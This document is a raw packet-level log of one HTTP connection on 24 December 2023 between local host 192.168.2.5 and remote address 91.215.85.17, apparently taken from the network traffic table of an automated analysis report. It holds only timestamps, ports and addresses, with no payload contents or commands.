Dec 24, 2023 10:44:28.471014977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471050978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471076965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471129894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471164942 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471172094 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471244097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471278906 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471302986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471348047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471390963 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471409082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471435070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471477985 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471506119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471555948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471589088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471591949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471684933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471721888 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471796989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471889019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.471923113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.471962929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472035885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472071886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472081900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472106934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472141981 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472170115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472237110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472274065 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472276926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472327948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472362995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472387075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472459078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472498894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472537994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472629070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472662926 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472675085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472748995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472784042 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472791910 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472841978 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472872019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.472925901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.472968102 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473002911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473017931 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473067045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473102093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473121881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473166943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473200083 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473221064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473265886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473304033 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473335028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473613977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473640919 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473661900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473701954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473737955 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473753929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473810911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473846912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473850965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473947048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.473982096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.473998070 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474065065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474100113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474112988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474155903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474196911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474229097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474282980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474318027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474334955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474385977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474420071 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474430084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474488974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474524021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474556923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474621058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474658012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474678040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474709988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474746943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474746943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474812984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474848032 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.474895954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474934101 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.474977970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475009918 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475106955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475120068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475143909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475172043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475208044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475235939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475296021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475337982 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475351095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475364923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475397110 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475425959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475474119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475511074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475560904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475718975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475755930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.475797892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.475964069 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476007938 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476072073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476120949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476159096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476176023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476231098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476268053 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476305008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476397991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476435900 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476460934 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476519108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476555109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476577044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476634026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476677895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476682901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476735115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476768970 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.476850033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476937056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.476975918 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477005959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477071047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477107048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477148056 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477231026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477267027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477282047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477341890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477374077 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477392912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477442026 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477477074 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477482080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477551937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477591991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477615118 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477617025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477657080 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477679014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477737904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477756977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477778912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477809906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477859974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477888107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477912903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.477950096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.477988958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478056908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478070021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478092909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.478133917 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478173018 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.478182077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478234053 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478269100 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.478291035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478382111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478416920 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.478483915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478702068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478739977 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.478781939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478795052 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.478821993 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479023933 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479099989 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479177952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479264975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479298115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479330063 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479391098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479424953 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479451895 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479500055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479533911 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479566097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479617119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479650974 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479655981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479723930 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479758024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479777098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479829073 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479875088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479893923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479931116 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.479965925 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.479990005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480046034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480058908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480115891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480125904 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480171919 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480187893 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480212927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480247021 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480261087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480317116 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480326891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480364084 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480392933 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480474949 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480495930 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480515003 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480539083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480609894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480648041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480663061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480705023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480741978 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480772018 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480819941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.480853081 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.480892897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481093884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481132984 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481195927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481302977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481352091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481357098 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481427908 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481461048 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481506109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481565952 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481601954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481616974 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481781006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481825113 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481858015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481906891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481920958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.481956005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.481987953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482024908 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482026100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482086897 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482122898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482211113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482278109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482319117 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482347965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482400894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482434034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482441902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482506990 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482542038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482546091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482614994 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482657909 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482682943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482729912 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482769966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.482781887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482795000 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.482845068 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484323025 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484509945 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484539986 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484590054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484633923 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484663010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484688044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484730959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484760046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484808922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484846115 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484864950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484914064 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.484956026 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.484981060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485028028 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485064983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485104084 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485182047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485224009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485248089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485290051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485326052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485349894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485374928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485411882 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485441923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485491037 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485531092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485555887 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485658884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485697031 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485722065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485775948 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485810995 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.485817909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.485979080 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486016035 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486046076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486108065 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486143112 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486171007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486196995 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486228943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486233950 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486310005 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486346006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486373901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486424923 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486463070 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486473083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486517906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486552954 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486565113 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486632109 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486649036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486675024 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486727953 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486768007 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486788034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486855984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486881971 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.486892939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486934900 CET	80	49716	91.215.85.17	192.168.2.5
